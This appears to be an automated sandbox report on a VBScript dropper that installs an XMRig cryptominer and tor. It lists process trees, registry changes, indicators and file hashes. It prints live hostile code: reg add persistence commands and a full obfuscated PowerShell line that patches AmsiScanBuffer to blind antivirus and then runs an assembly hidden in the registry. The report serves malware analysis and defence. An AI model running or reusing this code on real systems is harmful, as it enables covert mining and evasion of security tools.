xmrig | 06a9de0b7a1ce8a57375a10ea12f030a618e5f56d695f7e582c6ff79e7554757

Analysis

max time kernel
64s
max time network
13s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
16/04/2024, 22:32

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

77system.vbs
Size

4KB
MD5

5cd14942d071d4913f27b73dc36c7a11
SHA1

4942a26f4ee884b8b1a6468a1632af2bad4bec8e
SHA256

06a9de0b7a1ce8a57375a10ea12f030a618e5f56d695f7e582c6ff79e7554757
SHA512

ec1232c791d709676351a90730a738d145908341efe524fceaaffb1fb28e1e76deb87166f03665f56916f18def85d94e75402605581b0816d8200b2f9f01699a
SSDEEP

48:4h/lhaRdU4v0rLp9dct0BLptfK00LpNtb0rLpOgJ0JLpqL9AZ/R08LpC9JMHiM3j:AOuNrN/BNj0NNtYrNOnJNqLiZ/u8NC8L

Score

10^/10

xmrig miner

Malware Config

Signatures

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 3264 created 616	3264	powershell.EXE	5

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral2/files/0x0008000000023436-63.dat	family_xmrig
behavioral2/files/0x0008000000023436-63.dat	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Blocklisted process makes network request 6 IoCs

flow	pid	Process
7	912	wscript.exe
17	912	wscript.exe
28	912	wscript.exe
29	912	wscript.exe
30	912	wscript.exe
31	912	wscript.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-776854024-226333264-2052258302-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-776854024-226333264-2052258302-1000\Control Panel\International\Geo\Nation	wscript.exe

Executes dropped EXE 5 IoCs

pid	Process
1468	Install.exe
3984	Install.exe
4332	Install.exe
3404	$77xmrig.exe
3244	$77tor.exe

Loads dropped DLL 2 IoCs

pid	Process
1468	Install.exe
1468	Install.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 1468 set thread context of 4332	1468	Install.exe	101
PID 3264 set thread context of 1768	3264	powershell.EXE	104

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 46 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	dllhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	dllhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	dllhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	dllhost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	dllhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
5064	reg.exe
4232	reg.exe
5088	reg.exe

Script User-Agent 6 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	17	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	28	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	29	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	30	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	31	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	7	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
3264	powershell.EXE
3264	powershell.EXE
3264	powershell.EXE
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe
1768	dllhost.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3264	powershell.EXE
Token: SeDebugPrivilege	3264	powershell.EXE
Token: SeDebugPrivilege	1768	dllhost.exe

Suspicious use of WriteProcessMemory 51 IoCs

description	pid	Process	procid_target
PID 1292 wrote to memory of 912	1292	WScript.exe	83
PID 1292 wrote to memory of 912	1292	WScript.exe	83
PID 912 wrote to memory of 2604	912	wscript.exe	89
PID 912 wrote to memory of 2604	912	wscript.exe	89
PID 2604 wrote to memory of 5088	2604	cmd.exe	91
PID 2604 wrote to memory of 5088	2604	cmd.exe	91
PID 912 wrote to memory of 3948	912	wscript.exe	92
PID 912 wrote to memory of 3948	912	wscript.exe	92
PID 3948 wrote to memory of 5064	3948	cmd.exe	94
PID 3948 wrote to memory of 5064	3948	cmd.exe	94
PID 912 wrote to memory of 1272	912	wscript.exe	95
PID 912 wrote to memory of 1272	912	wscript.exe	95
PID 1272 wrote to memory of 4232	1272	cmd.exe	97
PID 1272 wrote to memory of 4232	1272	cmd.exe	97
PID 912 wrote to memory of 1468	912	wscript.exe	98
PID 912 wrote to memory of 1468	912	wscript.exe	98
PID 912 wrote to memory of 1468	912	wscript.exe	98
PID 1468 wrote to memory of 3984	1468	Install.exe	100
PID 1468 wrote to memory of 3984	1468	Install.exe	100
PID 1468 wrote to memory of 3984	1468	Install.exe	100
PID 1468 wrote to memory of 4332	1468	Install.exe	101
PID 1468 wrote to memory of 4332	1468	Install.exe	101
PID 1468 wrote to memory of 4332	1468	Install.exe	101
PID 1468 wrote to memory of 4332	1468	Install.exe	101
PID 1468 wrote to memory of 4332	1468	Install.exe	101
PID 1468 wrote to memory of 4332	1468	Install.exe	101
PID 1468 wrote to memory of 4332	1468	Install.exe	101
PID 1468 wrote to memory of 4332	1468	Install.exe	101
PID 1468 wrote to memory of 4332	1468	Install.exe	101
PID 3264 wrote to memory of 1768	3264	powershell.EXE	104
PID 3264 wrote to memory of 1768	3264	powershell.EXE	104
PID 3264 wrote to memory of 1768	3264	powershell.EXE	104
PID 3264 wrote to memory of 1768	3264	powershell.EXE	104
PID 3264 wrote to memory of 1768	3264	powershell.EXE	104
PID 3264 wrote to memory of 1768	3264	powershell.EXE	104
PID 3264 wrote to memory of 1768	3264	powershell.EXE	104
PID 3264 wrote to memory of 1768	3264	powershell.EXE	104
PID 1768 wrote to memory of 616	1768	dllhost.exe	5
PID 1768 wrote to memory of 3404	1768	dllhost.exe	105
PID 1768 wrote to memory of 3404	1768	dllhost.exe	105
PID 1768 wrote to memory of 664	1768	dllhost.exe	7
PID 1768 wrote to memory of 948	1768	dllhost.exe	12
PID 1768 wrote to memory of 1008	1768	dllhost.exe	13
PID 664 wrote to memory of 2684	664	lsass.exe	46
PID 1768 wrote to memory of 3244	1768	dllhost.exe	107
PID 1768 wrote to memory of 3244	1768	dllhost.exe	107
PID 1768 wrote to memory of 396	1768	dllhost.exe	14
PID 664 wrote to memory of 2684	664	lsass.exe	46
PID 1768 wrote to memory of 1036	1768	dllhost.exe	15
PID 1768 wrote to memory of 1064	1768	dllhost.exe	17
PID 1768 wrote to memory of 1072	1768	dllhost.exe	18

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:616
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:1008
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{4c3bd304-1826-404d-ad40-9db2518fb843}
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1768
- - C:\Users\Public\Documents\$77piper\$77xmrig.exe
    "C:\Users\Public\Documents\$77piper\$77xmrig.exe"
    3⤵
    - Executes dropped EXE
    PID:3404
- - C:\Users\Public\Documents\$77piper\$77tor.exe
    "C:\Users\Public\Documents\$77piper\$77tor.exe"
    3⤵
    - Executes dropped EXE
    PID:3244

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
- Suspicious use of WriteProcessMemory
PID:664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:948

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:396

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1036

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1072

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2684

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\77system.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1292
- C:\Windows\System32\wscript.exe
  "C:\Windows\System32\wscript.exe" "C:\Users\Admin\AppData\Local\Temp\77system.vbs" /elevated
  2⤵
  - Blocklisted process makes network request
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID:912
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg add HKLM\SOFTWARE\$77config\ /v ExampleValue /t REG_SZ /d ExampleData /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2604
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\$77config\ /v ExampleValue /t REG_SZ /d ExampleData /f
      4⤵
      Modifies registry key
      PID:5088
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg add HKLM\SOFTWARE\$77config\startup /v $77xmrig.exe /t REG_SZ /d C:\Users\Public\Documents\$77piper\$77xmrig.exe /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3948
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\$77config\startup /v $77xmrig.exe /t REG_SZ /d C:\Users\Public\Documents\$77piper\$77xmrig.exe /f
      4⤵
      Modifies registry key
      PID:5064
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c reg add HKLM\SOFTWARE\$77config\startup /v $77tor.exe /t REG_SZ /d C:\Users\Public\Documents\$77piper\$77tor.exe /f
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1272
  - - C:\Windows\system32\reg.exe
      reg add HKLM\SOFTWARE\$77config\startup /v $77tor.exe /t REG_SZ /d C:\Users\Public\Documents\$77piper\$77tor.exe /f
      4⤵
      Modifies registry key
      PID:4232
- - C:\Users\Public\Documents\$77piper\Install.exe
    "C:\Users\Public\Documents\$77piper\Install.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:1468
  - - C:\Users\Public\Documents\$77piper\Install.exe
      "C:\Users\Public\Documents\$77piper\Install.exe"
      4⤵
      Executes dropped EXE
      PID:3984
  - - C:\Users\Public\Documents\$77piper\Install.exe
      "C:\Users\Public\Documents\$77piper\Install.exe"
      4⤵
      Executes dropped EXE
      PID:4332

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:GMFhlTkQoEDF{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$pAglWAuPqDUWfA,[Parameter(Position=1)][Type]$LbENDqKOPb)$jNZmbrAmUOY=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+''+[Char](102)+''+'l'+'e'+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+'l'+'e'+''+'g'+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+'M'+'e'+[Char](109)+'or'+'y'+'M'+[Char](111)+''+'d'+''+[Char](117)+''+'l'+'e',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+'e'+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+'e'+'T'+'y'+''+'p'+''+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+''+','+''+'S'+''+[Char](101)+''+[Char](97)+'l'+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+'l'+[Char](97)+'s'+[Char](115)+''+','+''+[Char](65)+'u'+[Char](116)+''+[Char](111)+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$jNZmbrAmUOY.DefineConstructor(''+[Char](82)+'TSp'+'e'+'cia'+'l'+''+[Char](78)+'a'+'m'+''+'e'+''+[Char](44)+'Hi'+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+'i'+[Char](103)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$pAglWAuPqDUWfA).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+'t'+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+'d');$jNZmbrAmUOY.DefineMethod(''+'I'+'n'+[Char](118)+'o'+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+''+','+''+[Char](72)+''+'i'+'d'+'e'+''+'B'+'y'+'S'+'i'+'g'+''+','+'N'+[Char](101)+''+'w'+''+[Char](83)+''+'l'+''+[Char](111)+'t,'+[Char](86)+''+[Char](105)+'r'+[Char](116)+'u'+'a'+''+'l'+'',$LbENDqKOPb,$pAglWAuPqDUWfA).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+'ti'+'m'+'e'+[Char](44)+''+'M'+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+'e'+''+'d'+'');Write-Output $jNZmbrAmUOY.CreateType();}$oNNtEMHrrIgiY=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+''+[Char](115)+''+[Char](116)+'em.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType(''+'M'+''+'i'+''+[Char](99)+'r'+'o'+''+[Char](115)+''+'o'+''+[Char](102)+''+[Char](116)+'.W'+'i'+'n'+'3'+'2'+[Char](46)+''+'U'+''+'n'+''+[Char](115)+''+[Char](97)+'f'+'e'+''+'N'+''+[Char](97)+'ti'+'v'+''+'e'+''+[Char](77)+''+[Char](101)+'t'+'h'+''+'o'+''+'d'+''+[Char](115)+'');$xfOogOKSrRyxdm=$oNNtEMHrrIgiY.GetMethod('G'+'e'+''+[Char](116)+''+[Char](80)+''+'r'+''+'o'+''+'c'+''+[Char](65)+''+[Char](100)+''+'d'+'r'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+'ub'+[Char](108)+'i'+[Char](99)+''+[Char](44)+'St'+'a'+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ayoTLGgkWhLkUMJLHHo=GMFhlTkQoEDF @([String])([IntPtr]);$dbGPCVtIGCvUyGCWpVEODO=GMFhlTkQoEDF @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$ELWplzMqmPK=$oNNtEMHrrIgiY.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+''+'d'+'u'+[Char](108)+'e'+[Char](72)+''+[Char](97)+''+'n'+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object]('k'+[Char](101)+'r'+'n'+''+'e'+'l'+'3'+''+[Char](50)+'.d'+'l'+''+'l'+'')));$GzalScXiNWJtGy=$xfOogOKSrRyxdm.Invoke($Null,@([Object]$ELWplzMqmPK,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+'L'+''+'i'+''+[Char](98)+''+[Char](114)+'a'+[Char](114)+''+[Char](121)+''+'A'+'')));$OeJrPZDtfnJqPzBQu=$xfOogOKSrRyxdm.Invoke($Null,@([Object]$ELWplzMqmPK,[Object](''+[Char](86)+''+[Char](105)+''+'r'+''+[Char](116)+'u'+[Char](97)+''+'l'+''+'P'+''+[Char](114)+''+'o'+''+[Char](116)+''+'e'+''+'c'+''+[Char](116)+'')));$zqtxusK=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GzalScXiNWJtGy,$ayoTLGgkWhLkUMJLHHo).Invoke(''+[Char](97)+''+'m'+'s'+[Char](105)+'.dll');$zcanWgYRGYEFCMmcj=$xfOogOKSrRyxdm.Invoke($Null,@([Object]$zqtxusK,[Object](''+'A'+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](83)+''+'c'+''+'a'+'n'+[Char](66)+''+'u'+''+[Char](102)+''+'f'+''+'e'+''+'r'+'')));$JhXVmdNtyR=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OeJrPZDtfnJqPzBQu,$dbGPCVtIGCvUyGCWpVEODO).Invoke($zcanWgYRGYEFCMmcj,[uint32]8,4,[ref]$JhXVmdNtyR);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$zcanWgYRGYEFCMmcj,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($OeJrPZDtfnJqPzBQu,$dbGPCVtIGCvUyGCWpVEODO).Invoke($zcanWgYRGYEFCMmcj,[uint32]8,0x20,[ref]$JhXVmdNtyR);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+[Char](65)+'R'+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+[Char](115)+''+'t'+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3264

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\Documents\$77piper\$77tor.exe

Filesize
8.6MB

MD5
dcb04bad2eb62d8e258a8038e741c554

SHA1
ba64b4b7134d9ccda5cdd3624cdc898e3778fb7f

SHA256
33049016dd8985e97e69d89cad74b59b06488310c0be86d0f83b10ee096b7875

SHA512
8f0fb5a453030850c37e6f3b8f94bc0eb04512c4810dfc5499289dc74b1d02c38e639947245e996cfb3398449395d3ba59f1513f5a9c3283dc4d268f0d7265c5

Download Submit
C:\Users\Public\Documents\$77piper\$77tor.exe

Filesize
6.7MB

MD5
9ef5f4c9f15fdea8cd1625b9f46abef6

SHA1
4b7f5799e9e5d9190b887dd3a2d0fdc70db955dd

SHA256
198dcd64046be1c5dcf4a83d5aaa2764fbc028dae2eb4b0b31ce3101b7867ac8

SHA512
0629294b4ead0c90ec99eefe915d688e3a91d494173bd24a7ef1f31f24506292264ef04095c2d60efb8aa1058122ab05d933471d1b32443eed16cf8acfe85701

Download Submit
C:\Users\Public\Documents\$77piper\$77xmrig.exe

Filesize
6.1MB

MD5
4bd2631adfe4a256a72614c3f0d1aced

SHA1
d39b122677c85b271e1e0a1cad42ed08706dab2b

SHA256
810838fe05bf0fac2ca9659efa6d2d5bb6f0e324ce9330ad1ba6ec636844fb84

SHA512
8693597f30d05f8137338a74d415823f9a4b80133ae1483f6cb31e17f1806a1220d86d062237ab516e71b8092a9edd31125cc9c7692517542b01ad70ac0fe530

Download Submit
C:\Users\Public\Documents\$77piper\Install.exe

Filesize
4.9MB

MD5
4303c3493594e49fc3845b8e020f7651

SHA1
43a27335540978fef9860da40b0fcbffb8643bfa

SHA256
57569b6cd7997332f45589de689b2dda2d41a3817f49a8050fbed2986a871296

SHA512
52821514927ae22d07ffd946d2f3d4b7d300edf10fdcebe07cec41eb68795ab976a77599254bfd754e068805df9aacd6a7978322ffe72c808b0f957a7aa69400

Download Submit
C:\Users\Public\Documents\$77piper\config.json

Filesize
2KB

MD5
77e3679f898297ee3861ba8165e59c9f

SHA1
c348065399982e4dd1fffaa022672d8666933029

SHA256
952006b4f2140e7d83642533f77885aaf29d000729c826fb8c3b0cb175524003

SHA512
2d7fc260471bdbeb35e3a2599aa3d27c503c8f1b50597828c562e07ced162c749c808b67747db7ffb200272e2cecc89a8eae2fddb38aed949e6ecd4517385d4e

Download Submit
C:\Users\Public\Documents\$77piper\libgcc_s_dw2-1.dll

Filesize
105KB

MD5
c81c2063954800835adc179294cea84f

SHA1
4d42d9cbc5e4e34ad11b9d8560ff5ece6c4a6e4f

SHA256
a46d1688b40cf546234c816c2385978a7ecc8b3f97ae8c29aae5a42c7ce2d3dd

SHA512
8db68f576e8b32eb94d5839c47e10cdb59c1e281644ff7053fd33b6c9e4408f81a99acc9e91ab527da49fa579f9d28b0718476074275594f8d52de71f5b65d93

Download Submit
C:\Users\Public\Documents\$77piper\libstdc++-6.dll

Filesize
859KB

MD5
0c4a3de21d6551d43d1f8a11d4f09390

SHA1
f69caee171aa4b493681fd7d99f27a6215a4e0f8

SHA256
d0de05720c15f6b7105b90eaf005952beb73161df5d1b24eecd5bb892e1c6c8e

SHA512
c166a8ce3df615ac6d39f2f0cd95972e25eb16aa28e9726fc87792fc6c767f6f71e23eea5f3fbc412b72bc029de7440b0da6af655f7ea82c77a3adb66338a45b

Download Submit
C:\Windows\Temp\__PSScriptPolicyTest_ih2e5l4u.2wx.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/616-61-0x000002D82EE30000-0x000002D82EE5B000-memory.dmp

Filesize
172KB

Download
memory/616-76-0x000002D82EE30000-0x000002D82EE5B000-memory.dmp

Filesize
172KB

Download
memory/616-62-0x000002D82EE30000-0x000002D82EE5B000-memory.dmp

Filesize
172KB

Download
memory/616-60-0x000002D82EE00000-0x000002D82EE25000-memory.dmp

Filesize
148KB

Download
memory/616-79-0x00007FFCFDC70000-0x00007FFCFDC80000-memory.dmp

Filesize
64KB

Download
memory/616-80-0x00007FFD3DC8D000-0x00007FFD3DC8E000-memory.dmp

Filesize
4KB

Download
memory/664-77-0x0000023E1DF70000-0x0000023E1DF9B000-memory.dmp

Filesize
172KB

Download
memory/948-84-0x0000020B75FD0000-0x0000020B75FFB000-memory.dmp

Filesize
172KB

Download
memory/1008-92-0x0000019D4FE10000-0x0000019D4FE3B000-memory.dmp

Filesize
172KB

Download
memory/1468-27-0x000000006FC40000-0x000000006FD1E000-memory.dmp

Filesize
888KB

Download
memory/1468-25-0x000000006E940000-0x000000006E961000-memory.dmp

Filesize
132KB

Download
memory/1468-24-0x0000000000230000-0x0000000000277000-memory.dmp

Filesize
284KB

Download
